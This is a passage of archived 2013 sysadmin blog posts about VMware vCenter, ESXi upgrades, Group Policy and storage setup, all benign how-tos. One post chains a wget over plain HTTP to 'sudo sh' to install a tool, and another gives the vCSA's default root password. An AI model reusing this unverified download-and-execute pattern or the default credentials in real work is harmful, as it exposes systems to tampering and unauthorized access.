creates a dump file in /tmp. So far so good, we have a database dump but how to we automate it? Add a new file in /etc/cron.daily/ (for instance, use /etc/cron.hourly/ if that fits your RPO) called vcdbbackup.sh with the following content: #!/bin/sh /opt/vmware/vpostgres/1.0/bin/pg_dump VCDB -U vc -Fp -c > /tmp/VCDBBackupFile Then we need to make the cron script executable by running: chmod u+x /etc/cron.daily/vcdbbackup.sh And you should be ready to go! Of course, you should probably create the backup files somewhere else than in /tmp, and even mount a file share from another server in your environment and place the dump file there for safe keeping and further backup in your existing scheme. In addition to this, you can add other variables to the script like datestamping the file etc, but for now this is what I have done. By doing backups of the vCSA in this manner, you can have a standby vCSA laying around in case of a primary vCSA failure. If that happens, fire up the standby one, ssh to it and restore the vPostgres dump. I won’t go into details on that right now, but the command for restoring looks like this: PGPASSWORD=EMB_DB_PASSWORD ./psql -d EMB_DB_INSTANCE -Upostgres -f VCDBBackupFile Feature Request What VMware should do for the next version of the vCSA is to add external Microsoft SQL Server support, but if that´s off the table for some reason, at least let us manage database dumps via the vCSA admin interface? Please create pre-defined scripts and crontabs, and let us manage those. It might not be as good as external database support, when it comes to backup, but a little goes a long way in protecting this valuable resource in your infrastructure. References # Backing up and restoring the vCenter Server Appliance (vPostgres) database (2034505) --- # Upgrading vSphere vCenter Appliance 5.1 to 5.5 URL: https://vNinja.net/vmware-2/upgrading-vsphere-vcenter-appliance-5-1-5-5/ Date: 2013-09-30 Author: christian Tags: Appliance, Upgrade, vCenter, VCSA, vSphere, vSphere 5.5 In VMware KB Upgrading vCenter Server Appliance 5.0.x/5.1 to 5.5 (2058441) the procedure for upgrading an existing 5.0/5.1 vSphere vCenter Server Appliance is outlined, walking you through the steps required including deploying a new 5.5 vCSA and transferring the data from the old instance to the new one. Straight forward procedure, but there is one small caveat in this process. One important thing to remember, and something I don´t feel that the knowledge-base article highlights well enough is that the new v5.5 appliance should not be configured in any way when deployed. In my opinion there should be a new step between steps 1 and 2 in the KB article, detailing that the default blank values should not be changed at all. When using the “Deploy OVF” wizard in the Web Client or Desktop Client, you get asked for network details like IP, subnet, gateway and hostname. In order for the new appliance to successfully import your old data, and take over the old appliance details like hostname, IP adress and so forth, all these values should be left blank while importing to ensure a successful upgrade. If you do this, the upgrade succeeds as anticipated, and the old vCenter Server Appliance is powered down and the new one takes over. --- # Can you combine vSphere Host Cache and vFlash on a single SSD? URL: https://vNinja.net/vmware-2/combine-vsphere-host-cache-vflash-single-ssd/ Date: 2013-09-30 Author: christian Tags: 5.5, ESXi, featured, Host Cache, vCenter, vFlash, Virtualization, VMware, vSphere One of the new features in vSphere 5.5 is the vSphere vFlash that enables you to use a SSD/Flash device as a read cache for your storage. Duncan Epping has a series of posts on vSphere Flash Cache that is well worth a read. vSphere vFlash caches your read IOs, but at the same time you can use it as a swap device if you run into memory contention issues. The vSphere vFlash Host Cache is similar to the older Host Cache feature, but if you are upgrading from an older version of ESXi there is a couple of things that needs to be done to be able to use this feature. If you had the “old” Host Cache enabled before upgrading to v5.5, you have to delete the dedicated Host Cache datastore and re-create a new vSphere vFlash resource to be able to use both vFlash Host Cache and vSphere Flash Read Cache on the same SSD/Flash device. Also note that vFlash Read Cache is only available for VMs that run in ESXi 5.5 Compatibility Mode aka Virtual Hardware Version 10, and is enabled pr. VMDK in the VMs settings. Now you can utilize vFlash to both accelerate your read IOs, and speed up your host if you run into swapping issues. Good deal! --- # VMware vCenter Server Appliance Error: VPXD must be stopped to perform this operation URL: https://vNinja.net/vmware-2/vmware-vcenter-server-appliance-error-vpxd-stopped-perform-operation/ Date: 2013-09-29 Author: christian Tags: 5.5, ESXi, vCenter, vCenter Server Appliance, VMware, vSphere While deploying a fresh vCenter Server 5.5 Appliance, I ran into an issue getting it configured. When the appliance is deployed, the first time you log in you get presented with the configuration wizard. The wizard clearly states that if you want to set a static ip, or hostname, you should cancel the wizard, do the network configuration and then re-run the wizard after the fact. Well, that´s what I did, and it resulted in the following error when trying to create the embedded database: VC_CFG_RESULT=410(Error: VPXD must be stopped to perform this operation.) I even tried redeploying the appliance from scratch, but sadly that had the same outcome. In the end, I was able to complete the configuration by opening an SSH session to the vCenter appliance, and running the following command to stop the vmware-vpxd service mentioned in the error message: ~ # service vmware-vpxd stop After that I could successfully complete the Setup Wizard. Hopefully this will help someone finding themselves in the same conundrum in the future. Update # Since my setup is a single host, and at the moment of deploying the vCenter Server Appliance there was no existing vCenter in place, I deployed the appliance directly to an ESXi host. When you do this, you do not get the OVF deployment wizard that asks your IP adresses, netmasks etc. I suspect that this is the root cause of this issue, and that this is something you can/will run into of you deploy it in this manner. --- # Quick and Dirty ESXi 5.5 Upgrade URL: https://vNinja.net/virtualization/quick-dirty-esxi-5-5-upgrade/ Date: 2013-09-23 Author: christian Tags: 5.5, Command Line, esxcli, ESXi, Host, Upgrade, VIB, VMware, vSphere As I´ve posted about earlier, you can update your ESXi hosts to a new release from the command line. Now that ESXi 5.5 has been released, the same procedure can be applied to upgrade once more. Place the host in maintenance mode, then run the following command to do an online update to ESXi 5.5: ~ # esxcli software profile update -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml -p ESXi-5.5.0-1331820-standard While this runs, monitor the log file to check upgrade process: ~ # tail -f /var/log/esxupdate.log Let it run for a while all the way until it´s finished, reboot the host and hey presto, fresh new ESXi 5.5 upgrade completed! Quick and dirty, just the way we like it. To verify the version, still using the command line, issue the following command: ~ # vmware -l VMware ESXi 5.5.0 GA Of course, test this thoroughly before doing this in a production environment, after all your hosts might need VIBs not included in the standard download. Update 16.02.2015 # To find out which patches to apply, and what the correct profile name would be, check out the VMware ESXi Patch Tracker by Andreas Peetz. It’s a great resource to keep track of patches for your ESXi hosts. --- # Podcasting for Cancer URL: https://vNinja.net/virtualization/podcasting-cancer/ Date: 2013-09-14 Author: christian Tags: Awesome, Cancer, Community, Fundraising Some times all it takes is one single tweet to set things in motion: Just a year after losing Dad to cancer, Mom's has now spread from lung to other areas. Too soon for this shit. — Gabriel Chapman (@Bacon_Is_King) September 12, 2013 This started a spiral of tweets, discussions and ideas being thrown around and has now resulted in Podcasting for Cancer. The current goal is to raise $5000 USD by November 12th - Let´s absolutely crush that goal! --- # vSphere 5.5 Availability and VSAN Public Beta URL: https://vNinja.net/vmware-2/vsphere-5-5-availability-vsan-public-beta/ Date: 2013-09-12 Author: christian Tags: Speculation, VMware, VSAN, vSphere, vSphere 5.5 As Eric Siebert has pointed out, the VMware vSphere release cycles are shortening. While vSphere 5.1 could be seen as a bit rushed, especially in regards to SSO, when it was released, the shorter release cycles seem to work out pretty well. This does make me think though; vSphere 5.5 is pretty much ready to be released to the general public, and the new VSAN component will be in a public beta at the same time. Does this indicate that VMware might actually be moving to a more modular approach, with different release cycles for different components? I can see how this works for “add-on” products like Horizon View, VDP and so on, but for “core” components like a new the local storage layer this is a new one. Is this a new modular approach or is due to the fact that the release cycle this time around was too short to get VSAN included? Or, perhaps is it as simple as Jason A Linden just suggested on Twitter; VSAN will be included in vSphere 5.5 Update 1? --- # Veeam Webinar & NFR Licenses URL: https://vNinja.net/virtualization/veeam-webinar-nfr-licenses/ Date: 2013-09-05 Author: christian Tags: Backup & Replication v7, NFR, Veeam, vSphere, Webinar This coming tuesday the first ever Veeam Webinar held in Norwegian will be held by yours truly. Feel free to sign up now and listen to me speak for an hour or so. Also, Veeam is continuing it´s support of the virtualization community and is yet again offering free 180-days Veeam Backup Management Suite v7 NFR licenses for VMware and Hyper-V. Note that this offer is only available to anyone who is one of the following: VMware vExpert, VMware Certified Professional (VCP), Microsoft Certified Professional (MCP), Microsoft Certified Technology Specialist (MCTS) and Most Valuable Professional (MVP) --- # My Slate Setup URL: https://vNinja.net/osx/slate-setup/ Date: 2013-07-31 Author: christian Tags: KeyRemap4MacBook. Customization, OS X, PCKeyboardHack, Setup, Slate, Software, Window Manager About a year and a half I go, I took the leap from running Microsoft Windows as my main operating system and switched into full “hipster mode”, i.e. switched to a Macbook Air and OS X. Simply put, “the change” was not that hard and most everything has worked without problems, and for those things that still require Microsoft Windows, well, there is VMware Fusion for that. While I´m admittedly still a novice OS X user, and not even close to mastering OS X, I´d like to share my current Slate setup. Slate is a OS X window manager that makes it much easier to resize, focus and arrange your applications. The real beauty of it is that everything is controlled via the keyboard, no need to reach for the mouse. By combining PCKeyboardHack and KeyRemap4MacBook with Slate, I am now able to move my windows to pre-arranged locations on my display, or even “throw” a window to another monitor if required. None of this was originally my idea, I´ve stolen quite a bit from Using Slate: A Hacker’s Window Manager for Macs and other sources, but the end result is simply a dream to work with. As suggested in A useful Caps Lock key, I have remapped my Caps Lock key to F19, and set F19 up as Hyper key (Control, Command, Option and Shift pressed simultaneously), and use that as a trigger in Slate. One thing I always forget to do though, is to disable the Caps Lock key whenever I connect a new keyboard to the Mac. After a recent re-install I could not for the life of me figure out why this setup was not working, until I remembered that I had to disable the key (as mentioned in the article linked to above). The first thing you’ll need to do is disable the Caps Lock key in OS X. Head to System Preferences’ Keyboard pane and click the “Modifier Keys…” button. Set Caps Lock to “No Action.” My current .slate config files looks like this Seasoned Slate users, will notice that I am barely scratching the surface of what is possible here, but this is a work in progress. I really want to set up pre-defined application locations and window sizes based on my various multi-monitor setups (Macbook only, home office, work office, etc.), but that is still a work in progress. How fun is it being able to hit caps-lock right-arrow and throw an application window from the internal Macbook screen to a secondary screen on my right? And at the same time resize it to fill the entire screen! I may just be me, but I do find pleasure in these little things. Especially when they just work. Now I just have to remember to use them frequently, muscle-memory is a powerful tool when it comes to efficiency. --- # Monitoring the ESXi Upgrade Process URL: https://vNinja.net/vmware-2/monitoring-esxi-upgrade-process/ Date: 2013-06-26 Author: christian Tags: ESXi, Log, Maintenance, Ops, Real World, Upgrade, Virtualization, VMware, vSphere When doing manual host upgrades, either through the direct method or via a locally placed upgrade bundle, there is a distinct lack of progress information available after running the esxcli command. Thankfully the ESXi host provides a running logfile of the upgrade process, which makes it much easier to keep track of what is going on and that the upgrade is indeed being performed. The esxupdate.log is located in /var/log, and by issuing the following command in a terminal window you can have a rolling log showing you the upgrade status and progress: ~ # tail -f /var/log/esxupdate.log By running the following command in one terminal window (this uses the VMware offline bundle to upgrade from ESXi 5.1 to 5.1 Update 1): ~ # esxcli software vib update -d /vmfs/volumes/[lunID]/update-from-esxi5.1-5.1_update01.zip you get output like this in the secondary terminal window where the log file is being monitored: 2013-06-26T10:24:51Z esxupdate: HostImage: INFO: Attempting to download VIB tools-light 2013-06-26T10:25:07Z esxupdate: vmware.runcommand: INFO: runcommand called with: args = '/sbin/backup.sh 0 /altbootbank', outfile = 'None', returnoutput = 'True', timeout = '0.0'. 2013-06-26T10:25:08Z esxupdate: BootBankInstaller.pyc: INFO: boot config of '/altbootbank' is being updated, 5 2013-06-26T10:25:08Z esxupdate: HostImage: DEBUG: Host is remediated by installer: locker, boot 2013-06-26T10:25:08Z esxupdate: root: DEBUG: Finished execution of command = vib.install 2013-06-26T10:25:08Z esxupdate: root: DEBUG: Completed esxcli output, going to exit esxcli-software That sure beats waiting “blindly” for an upgrade/installation to finish, and in many ways this is also much better than a non-sensical progressbar. --- # Centrally Disable NAT in VMware Workstation URL: https://vNinja.net/vmware-2/centrally-disable-nat-vmware-workstation/ Date: 2013-06-25 Author: christian Tags: GPMC, Group Policy, Group Policy Preferences, management, VMware, VMware Workstation, Windows, Workstation A fellow IT-professional, who works with the non-wired flavor of networking, contacted me with the following scenario: A group of users, developers in this case, have VMware Workstation installed on their laptops. This makes it easy for them to manage, test and develop their applications in a closed environment without having to install a bunch of tools/services on their centrally managed laptop environment. An excellent use case for VMware Workstation if there ever was one. So far, so good. The problem in this particular case was that due to security policies in the network infrastructure there was a need to disable the NAT networking possibilities in VMware Workstation. Network address translation (NAT) configures your virtual machine to share the IP and MAC addresses of the host. The virtual machine and the host share a single network identity that is not visible outside the network. NAT can be useful when you are allowed a single IP address or MAC address by your network administrator. You might also use NAT to configure separate virtual machines for handling http and ftp requests, with both virtual machines running off the same IP address or domain. See Network Address Translation (NAT). VMware Workstation NAT Configuration[/caption] Since the VM shares the host MAC address and IP, blocking network access from the VM is not trivial in this scenario. Thankfully, in VMware Workstation for Windows, NAT is provided through a Windows Service that we can manipulate. By disabling the “VMware NAT Service” we can ensure that NAT does not work, and that the only real alternative is to run the VM in “Bridged Mode”. Bridged Mode makes it easier for network admins to manipulate access, since the virtual network adapter is exposed to the switches with their own MAC address, and thus possibly also their own IP address, and the VM is not “hidden” behind the hosts MAC. For instance, this makes it possible for the network gurus to limit the VMs physical network access to internet access only, and not exposing the internal network to the VM. Running around disabling the “VMware NAT Service” on all clients that run VMware Workstation is no fun job, so naturally we need to find a way to automate this as well. Enter Group Policy Preferences # On a computer that has VMware Workstation installed, run the Group Policy Management Console and create a new GPO. In Computer Configuration > Preferences > Control Panel Settings select Services In the menu click on Action > New > Service and and click on “…” next to the Service Name field Select the “VMware NAT Service"and click “Select” Set the Startup mode to “disabled” Assign this new Group Policy Preference to the OU that the clients that have VMware Workstation installed on resides in, and the next time the policies are refreshed, the “VMware NAT Service” should be set to disabled.Note: This might require a reboot of the client. Profit. And there it is, a workaround on how to disable the possibility for VMs running in VMware Workstation utilizing NAT mode. A bit of a hack, but it works. Wishlist # I really wish VMware would include the possibility to configure and manage multiple VMware Workstation for Windows installs, through Group Policy and Group Policy Preferences The ability to centrally manage configurations and settings would be a welcome addition to this already excellent piece of software, and I am sure that I am not alone in asking for this possibility. So how about it VMware, yay or nay? --- # Virtual Connect FlexFabric and Direct-Attach FC 3Par Caveat URL: https://vNinja.net/storage-2/virtual-connect-flexfabric-direct-attach-fc-3par-caveat/ Date: 2013-05-30 Author: christian Tags: 3Par, BladeSystem, Bug, Fibre Channel, HP, SFP+, storage, StoreServ, Virtual Connect When configuring a new C7000 Blade Enclosure with a couple of FlexFabric 10Gb/24-port modules I ran into a rather annoying issue during setup. HP Virtual Connect 3.70 introduced support for Direct-Attach setups of HP 3Par StoreServ 7000 storage systems, where you can eliminate the need for dedicated FC switches. For full details, have a look at Implementing HP Virtual Connect Direct-Attach Fibre Channel with HP 3PAR StoreServ Systems. This is excellent for setups where all your hosts are HP Blades, and you have a Virtual Connect FlexFabric setup. After all, less components means less complexity, right? The problem I ran into is a bit strange though, and it took some time figuring out what was wrong. The HP 3Par StoreServ 7200 was racked, stacked and configured when the FC SFP+ modules where installed in the FlexFabric module, and I pretty much thought it would be plug and play from there to get the blades to talk FC to the HP 3Par after going through the Virtual Connect setup. Sadly, that was not the case. It seems there is a bug in the web GUI for VC 3.70 that prevents getting a working setup. I know 3.75 is released, but nothing in the release notes seem to indicate that this has been fixed in that release. For some reason, the “Fabric Type” dropdown where you should be able to select either “FabricAttach” or “DirectAttach” is greyed out, thus preventing the proper configuration of the SAN Fabric in “DirectAttach” mode. It defaults to “FabricAttach”, and in a Direct-Attach scenario that simply does not work. You will not be able to get a FC link and the SFP+ module will be listed as “unsupported”. The solution was to create the SAN Fabric manually by using the Virtual Connect CLI interface. T he following commands created the two fabrics required for redundancy (VC module in Bay 1 and in Bay 2) add fabric Fabric-1-3PAR Bay=1 Ports=1 Type=DirectAttach add fabric Fabric-2-3PAR Bay=2 Ports=1 Type=DirectAttach As you can see, by using the add fabric command it was possible to define the correct Fabric Type and I could then proceed to add Port 2 from Bay 2 to Fabric-1-3PAR and vice versa to create a fully redundant setup. --- # Quick and Dirty HTTP Based Deployment URL: https://vNinja.net/virtualization/quick-and-dirty-http-based-deployment/ Date: 2013-05-14 Author: christian Tags: automation, Deployment, fun, http, Python, realworld, vMA, VMware, vSphere A lot of the scripted installation tools that VMware offers allows the usage of a central HTTP based repository for hosting the files. Today I stumbled over a little gem that might just help you create a “quick and dirty” HTTP based deployment scenario by running a simple command in your terminal. By default, this command works on any system that has Python installed on it, so OS X and Linux should be ready to go as is. As for you Windows users out there, well, your mileage will vary. The trick here is a one line Python command that simply creates a HTTP server listing the files in your current directory over a given port. On my MacBook, I opened Terminal and ran the following command: python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 .. If I then open my browser, and point it to the IP address of my MacBook, I get a directory listing showing the contents of the current directory. As you can see, the directory contains a few files, namely a Damn Small Linux appliance packaged as an OVA, as well as the Linux installation files for ovftool. In this particular case, I wanted to install ovftool inside a running vMA instance I had in my infrastructure. So, by running the following commands I got ovftool downloaded via HTTP, from my MacBook, inside a running vMA instance by only downloading the files in to a given directory and serving it via HTTP from there to vMA. By running the following command (output edited for verbosity) vi-admin@record:> wget http://192.168.5.62:8000/VMware-ovftool-3.0.1-801290-lin.x86_64.bundle && sudo sh VMware-ovftool-3.0.1-801290-lin.x86_64.bundle 100%[======================================>] 36,631,447 1.46M/s in 23s 2013-05-14 12:13:06 (1.52 MB/s) - `VMware-ovftool-3.0.1-801290-lin.x86_64.bundle.saved [36631447/36631447] ... vi-admin's password: Extracting VMware Installer...done. ... Do you agree? [yes/no]: yes ... Installing VMware OVF Tool component for Linux 3.0.1 Configuring... [######################################################################] 100% Installation was successful. vi-admin@record:/tmp> I was able to download and install ovftool, in one command. The same deployment method could also easily be used to install host patches, deploy OVF based appliances and even install VIB files from a central repository. In fact, thats the next thing to do here, deploy the Damn Small Linux appliance, by using the newly installed ovftool package. The flexibility of having a small HTTP server available by running a single command is great, and Im sure there are many other use cases that I have yet to consider. --- # Quick and Dirty ESXi 5.1U1 Upgrade URL: https://vNinja.net/vmware-2/quick-dirty-esxi-5-1u1-upgrade/ Date: 2013-04-26 Author: christian Tags: Command Line, ESXi, Host, Upgrade, VMware Now that VMware ESXi 5.1 Update 1 has been released I decided to do a quick and dirty upgrade of my home installation. I refuse to call it a lab these days, since it´s one singular host and all it does it contain my home domain controller… Anyway, the following procedure upgraded the host from 5.1b to 5.1U1, by downloading the upgrade directly from VMware and installing it. Make sure the host is in maintenance mode before attempting this procedure. Check Correlating vCenter Server and ESXi/ESX host build numbers to update levels (1014508) to determine which of the update files in the repository to download. SSH into your host, and issue the following command: ~ # esxcli software profile update -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml -p ESXi-5.1.0-20130402001-standard This will initiate a download of the new ESXi version and install the update automatically, beware that it will not show any progress bar or indication while the file is being downloaded from the VMware repository. The command above will only work, as Erik pointed out in the comments, if you have allowed the httpClient outgoing access on the ESXi server. If not, you can enable it by running the following command on the host (or by using the vSphere Client): ~ # esxcli network firewall ruleset set -e true -r httpClient You can of course monitor your download with the vSphere Client (web or otherwise), to make sure nothing has stopped. You can also monitor the upgrade process by looking at the VMware logs Monitoring the ESXi Upgrade Process as Paul suggested in the comments. Once it´s done, it will look like this: Update Result Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective. Reboot Required: true VIBs Installed: VMware_bootbank_esx-base_5.1.0-1.12.1065491, VMware_bootbank_esx-xserver_5.1.0-0.11.1063671, VMware_bootbank_ipmi-ipmi-si-drv_39.1-4vmw.510.1.12.1065491, VMware_bootbank_misc-drivers_5.1.0-1.12.1065491, VMware_bootbank_net-bnx2_2.0.15g.v50.11-7vmw.510.1.12.1065491, VMware_bootbank_net-bnx2x_1.61.15.v50.3-1vmw.510.0.11.1063671, VMware_bootbank_net-e1000e_1.1.2-3vmw.510.1.12.1065491, VMware_bootbank_net-igb_2.1.11.1-3vmw.510.1.12.1065491, VMware_bootbank_net-ixgbe_3.7.13.6iov-10vmw.510.1.12.1065491, VMware_bootbank_net-tg3_3.123b.v50.1-1vmw.510.1.12.1065491, VMware_bootbank_scsi-megaraid-sas_5.34-4vmw.510.1.12.1065491, VMware_locker_tools-light_5.1.0-1.12.1065491 VIBs Removed: VMware_bootbank_esx-base_5.1.0-0.10.1021289, VMware_bootbank_esx-xserver_5.1.0-0.0.799733, VMware_bootbank_ipmi-ipmi-si-drv_39.1-4vmw.510.0.0.799733, VMware_bootbank_misc-drivers_5.1.0-0.0.799733, VMware_bootbank_net-bnx2_2.0.15g.v50.11-7vmw.510.0.0.799733, VMware_bootbank_net-bnx2x_1.61.15.v50.3-1vmw.510.0.0.799733, VMware_bootbank_net-e1000e_1.1.2-3vmw.510.0.0.799733, VMware_bootbank_net-igb_2.1.11.1-3vmw.510.0.0.799733, VMware_bootbank_net-ixgbe_3.7.13.6iov-10vmw.510.0.0.799733, VMware_bootbank_net-tg3_3.110h.v50.4-4vmw.510.0.0.799733, VMware_bootbank_scsi-megaraid-sas_5.34-4vmw.510.0.0.799733, VMware_locker_tools-light_5.1.0-0.9.914609 VIBs Skipped: VMware_bootbank_ata-pata-amd_0.3.10-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-atiixp_0.4.6-4vmw.510.0.0.799733, VMware_bootbank_ata-pata-cmd64x_0.2.5-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-hpt3x2n_0.3.4-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-pdc2027x_1.0-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-serverworks_0.4.3-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-sil680_0.4.8-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-via_0.3.3-2vmw.510.0.0.799733, VMware_bootbank_block-cciss_3.6.14-10vmw.510.0.0.799733, VMware_bootbank_ehci-ehci-hcd_1.0-3vmw.510.0.0.799733, VMware_bootbank_esx-dvfilter-generic-fastpath_5.1.0-0.0.799733, VMware_bootbank_esx-tboot_5.1.0-0.0.799733, VMware_bootbank_esx-xlibs_5.1.0-0.0.799733, VMware_bootbank_ima-qla4xxx_2.01.31-1vmw.510.0.0.799733, VMware_bootbank_ipmi-ipmi-devintf_39.1-4vmw.510.0.0.799733, VMware_bootbank_ipmi-ipmi-msghandler_39.1-4vmw.510.0.0.799733, VMware_bootbank_misc-cnic-register_1.1-1vmw.510.0.0.799733, VMware_bootbank_net-be2net_4.1.255.11-1vmw.510.0.0.799733, VMware_bootbank_net-cnic_1.10.2j.v50.7-3vmw.510.0.0.799733, VMware_bootbank_net-e1000_8.0.3.1-2vmw.510.0.0.799733, VMware_bootbank_net-enic_1.4.2.15a-1vmw.510.0.0.799733, VMware_bootbank_net-forcedeth_0.61-2vmw.510.0.0.799733, VMware_bootbank_net-nx-nic_4.0.558-3vmw.510.0.0.799733, VMware_bootbank_net-r8168_8.013.00-3vmw.510.0.0.799733, VMware_bootbank_net-r8169_6.011.00-2vmw.510.0.0.799733, VMware_bootbank_net-s2io_2.1.4.13427-3vmw.510.0.0.799733, VMware_bootbank_net-sky2_1.20-2vmw.510.0.0.799733, VMware_bootbank_net-vmxnet3_1.1.3.0-3vmw.510.0.0.799733, VMware_bootbank_ohci-usb-ohci_1.0-3vmw.510.0.0.799733, VMware_bootbank_sata-ahci_3.0-13vmw.510.0.0.799733, VMware_bootbank_sata-ata-piix_2.12-6vmw.510.0.0.799733, VMware_bootbank_sata-sata-nv_3.5-4vmw.510.0.0.799733, VMware_bootbank_sata-sata-promise_2.12-3vmw.510.0.0.799733, VMware_bootbank_sata-sata-sil24_1.1-1vmw.510.0.0.799733, VMware_bootbank_sata-sata-sil_2.3-4vmw.510.0.0.799733, VMware_bootbank_sata-sata-svw_2.3-3vmw.510.0.0.799733, VMware_bootbank_scsi-aacraid_1.1.5.1-9vmw.510.0.0.799733, VMware_bootbank_scsi-adp94xx_1.0.8.12-6vmw.510.0.0.799733, VMware_bootbank_scsi-aic79xx_3.1-5vmw.510.0.0.799733, VMware_bootbank_scsi-bnx2i_1.9.1d.v50.1-5vmw.510.0.0.799733, VMware_bootbank_scsi-fnic_1.5.0.3-1vmw.510.0.0.799733, VMware_bootbank_scsi-hpsa_5.0.0-21vmw.510.0.0.799733, VMware_bootbank_scsi-ips_7.12.05-4vmw.510.0.0.799733, VMware_bootbank_scsi-lpfc820_8.2.3.1-127vmw.510.0.0.799733, VMware_bootbank_scsi-megaraid-mbox_2.20.5.1-6vmw.510.0.0.799733, VMware_bootbank_scsi-megaraid2_2.00.4-9vmw.510.0.0.799733, VMware_bootbank_scsi-mpt2sas_10.00.00.00-5vmw.510.0.0.799733, VMware_bootbank_scsi-mptsas_4.23.01.00-6vmw.510.0.0.799733, VMware_bootbank_scsi-mptspi_4.23.01.00-6vmw.510.0.0.799733, VMware_bootbank_scsi-qla2xxx_902.k1.1-9vmw.510.0.0.799733, VMware_bootbank_scsi-qla4xxx_5.01.03.2-4vmw.510.0.0.799733, VMware_bootbank_scsi-rste_2.0.2.0088-1vmw.510.0.0.799733, VMware_bootbank_uhci-usb-uhci_1.0-3vmw.510.0.0.799733 ~ # Reboot your host, and behold the glory of the new ESXi 5.1 Update 1 version! If you want to know how to figure out how to find the correct URL and file, check out William Lam´s excellent A Pretty Cool Method of Upgrading to ESXi 5.1 post, which provides more details. I told you it was quick and dirty, didn`t I? --- # Adding a secondary NIC to the vCenter 5.1 Appliance (VCSA) URL: https://vNinja.net/virtualization/adding-secondary-nic-vcenter-5-1-appliance-vcsa/ Date: 2013-04-25 Author: christian Tags: ESXi, Hack, Networking, vCenter, VCSA, Virtualization, vSphere While building my lab environment, I ran into a situation where I wanted to have a completely sealed off networking segment that had no outside access. This is a trivial task on it`s own, just create a vSwitch with no physical NICs attached to it, and then connect the VMs to it. The VMs will then have interconnectivity, but no outside network access at all. In this particular case, I was setting up a couple of nested ESXi servers that I wanted to connect to the “outside” vCenter Appliance (VCSA). This VCSA instance was not connected to the internal-only vSwitch, but rather to the existing vSwitch that as local network access. Naturally, the solution would be to add a secondary NIC to the VCSA, and connect that to the internal-only vSwitch. It turns out that adding a secondary NIC to a VCSA instance, isn`t as straight-forward as you might think. Sure, adding a new NIC is no problem through either the vSphere Client, or the vSphere Web Client, but getting the NIC configured inside of VCSA is another matter. If you add a secondary NIC, it will turn up in the VCSA management web page, but you will not be able to save the configuration since the required configuration files for eth1 is missing. In order to rectify this, I performed the following steps: Connect to the VCSA via SSH (default username and password is root/vmware) Copy /etc/sysconfig/networking/devices/ifcfg-eth0 to /etc/sysconfig/networking/devices/ifcfg-eth1 Edit _ifcfg-eth1 _and replace the networking information with your values, here is how mine looks: DEVICE=eth1 BOOTPROTO='static' STARTMODE='auto' TYPE=Ethernet USERCONTROL='no' IPADDR='172.16.1.52' NETMASK='255.255.255.0' BROADCAST='172.16.1.255' Create a symlink for this file in /etc/sysconfig/network ln -s /etc/sysconfig/networking/devices/ifcfg-eth1 /etc/sysconfig/network/ifcfg-eth1[/cc] Restart the networking service to activate the new setup: service network restart[/cc]Check the VCSA web management interface to verify that the new settings are active By adding a secondary NIC, configuring it and connecting it to the isolated vSwitch I was now able to add my sequestered nested ESXi hosts to my existing VCSA installation. There may be several reasons for a setup like this, perhaps you want your VCSA to be available on a management VLAN but reach ESXi hosts on another VLAN without having routing in place between the segmented networks, or you just want to play around with it like I am in this lab environment. Disclaimer: Is this supported by VMware? Probably not, but I simply don`t know. Caveat emptor, and all that jazz. Update February 2016 # This post is written with VCSA5.x in mind, and is not tested on VCSA 6.x. William Lam has posted Caveats when multi-homing the vCenter Server Appliance 6.x w/multiple vNICs with information on what caveats exist if you are looking to do this with the newer v6.x infrastructure. --- # Installing Dell Equallogic Multipathing Extension Module (MEM) in vSphere 5.1 URL: https://vNinja.net/virtualization/installing-dell-equallogic-multipathing-extension-module-mem-vsphere-5-1/ Date: 2013-04-22 Author: christian Tags: Dell, Equallogic, ESXi, HowTo, Multipath, storage, vSphere Dell offers a Multipathing Extension Module (MEM) for vSphere, and in this post I´ll highlight how to “manually” install it on a ESXi 5.1 host. I will not cover the network setup part of the equation, but rather go through the simple steps required to get the MEM installed on the hosts in question. First of all, you need to download the MEM installation package. At the time of writing, the latest version is v1.1.2.292203, available from equallogic.com. One the archive file is aquired, unzip it and upload the dell-eql-mem-esx5-1.1.2.292203.zip file to a shared location available in your environment. For the example below, I have used a VMFS datastore that is available to all the hosts in this particular cluster. Note: The host in question has already been put in maintenance mode, to make sure no VMs are actively using the storage paths while installing the module. The VIB file, which resides inside the dell-eql-mem-esx5-1.1.2.292203.zip, file can be installed using several techniques; By using the vMA, vSphere Command-Line Interface (vSphere CLI), vSphere Update Manager or even by logging in to the hosts via a SSH connection, and in this case I opted for doing it through SSH. The command required to install the MEM is as follows: esxcli software vib install --depot /vmfs/volumes/vmfsvol/dell/dell-eql-mem-esx5-1.1.2.292203.zip A completed installation looks like this: login as: root Using keyboard-interactive authentication. Password: The time and date of this login have been sent to the system logs. VMware offers supported, powerful system administration tools. Please see www.vmware.com/go/sysadmintools for details. The ESXi Shell can be disabled by an administrative user. See the vSphere Security documentation for more information. ~ # esxcli software vib install --depot /vmfs/volumes/vmfsvol/dell/dell-eql-mem-esx5-1.1.2.292203.zip Installation Result Message: Operation finished successfully. Reboot Required: false VIBs Installed: Dell_bootbank_dell-eql-host-connection-mgr_1.1.1-268843, Dell_bootbank_dell-eql-hostprofile_1.1.0-212190, Dell_bootbank_dell-eql-routed-psp_1.1.1-262227 VIBs Removed: VIBs Skipped: ~ # I then restart the hosts process, to make sure that the multipath module is activated. ~ # /etc/init.d/hostd restart watchdog-hostd: Terminating watchdog process with PID 9592 hostd stopped. hostd started. ~ # Finally, a quick check to see if the new Equallogic namespace is available, and that it is gathering statistics, i.e. being used: ~ # esxcli equallogic stat summary DeviceId VolumeName PathCount Reads Writes KBRead KBWritten -------------------------------- ---------- --------- ----- ------ ------ --------- 6090A098E0DC5D9F71E6940292F8569C vmvolume 2 2573 30 20429 14 6090A098D06C5A31CEDE44CC17CBF14B test2t 2 651 30 13028 14 6090A098D06C4AF067EDD4C904C6A453 vmvolume3 2 642 30 10592 14 6090A098C08D5E928EE634938F42605B vmvolume1 2 1834 30 20023 14 ~ Screenshots displaying the ESXi host path policy before: and after installing the Dell Equallogic MEM: --- # It's Not Your Average Data it's vOpenData URL: 